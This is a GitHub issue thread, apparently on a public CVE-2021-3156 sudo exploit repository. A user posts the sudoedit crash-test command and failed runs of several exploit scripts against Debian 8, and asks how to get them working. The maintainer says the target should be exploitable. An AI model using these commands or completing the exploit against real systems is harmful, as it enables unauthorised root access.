CVE-2021-3156 icon indicating copy to clipboard operation
CVE-2021-3156 copied to clipboard

Published 20 hours ago verified publisher icon worawit

Exploitation on Debian 8 (jessie)

Open xhat007 opened this issue 3 years ago • 2 comments

Hi @worawit

Is exploitation possible on Debian 8 ?

$ sudo --version Sudo version 1.8.10p3 Sudoers policy plugin version 1.8.10p3 Sudoers file grammar version 43 Sudoers I/O plugin version 1.8.10p3

$ uname -r 3.16.0-4-amd64

$ sudoedit -s '01234567890123456789' *** Error in `sudoedit': malloc(): memory corruption: 0x00005637fc4a7ea0 *** Aborted

I tried the following exploits : () () ()

$ python exploit_nss_u14.py Segmentation fault

$ python exploit_nss_u16.py Segmentation fault

$ python exploit_nss_d9.py Segmentation fault

$ python exploit_userspec.py

curr size: 0x1600

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005634c93fcbd0 ***

curr size: 0x1b00

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055bbd93f80d0 ***

curr size: 0x1d80

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055a8debe8350 ***

curr size: 0x1ec0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x0000562e47bd3490 ***

curr size: 0x1f60

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x0000561a4e9e9530 ***

curr size: 0x1fb0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005564bab37580 ***

curr size: 0x1fd0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055bcb07335a0 ***

curr size: 0x1fe0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055fd181b45b0 ***

curr size: 0x1ff0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005587a03975c0 ***

has 2 holes. very big one is bad

curr size: 0xc00

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005651a540e1e0 ***

curr size: 0x1000

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055f198e1f5e0 ***

curr size: 0x1400

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x0000563b20a3d9e0 ***

curr size: 0x1800

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055b4f44c6de0 ***

curr size: 0x1c00

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055d6e1c371e0 ***

Traceback (most recent call last): File "exploit_userspec.py", line 736, in main() File "exploit_userspec.py", line 652, in main cmnd_size = find_cmnd_size() File "exploit_userspec.py", line 173, in find_cmnd_size assert found, "Cannot find cmnd size" AssertionError: Cannot find cmnd size

Any help would be appreciated!

xhat007 avatar May 02 '21 16:05 xhat007

I have no test on Debian 8. From sudo and glibc version, it should be exploitable.

From output, my exploit fail at first step. I cannot help you for this case because debugging is needed.

worawit avatar May 12 '21 12:05 worawit

Hi @worawit

What do i need to do to debug ?

Thanks.

xhat007 avatar May 18 '21 00:05 xhat007